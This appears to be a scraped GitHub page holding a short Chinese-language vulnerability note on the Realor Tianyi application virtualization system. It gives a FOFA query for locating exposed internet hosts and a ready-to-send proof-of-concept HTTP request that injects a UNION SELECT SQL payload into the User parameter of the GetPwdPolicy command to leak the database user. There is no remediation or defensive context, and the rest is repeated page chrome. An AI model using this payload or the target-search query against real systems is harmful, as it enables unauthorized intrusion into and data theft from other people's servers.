瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞

fofa

app="REALOR-天翼应用虚拟化系统"

poc

GET /RAPAgent.XGI?CMD=GetPwdPolicy&User=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7e%2C%28SELECT+user()%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md

瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md

瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞

fofa

poc

Files

瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md

Latest commit

History

瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md

File metadata and controls

瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞

fofa

poc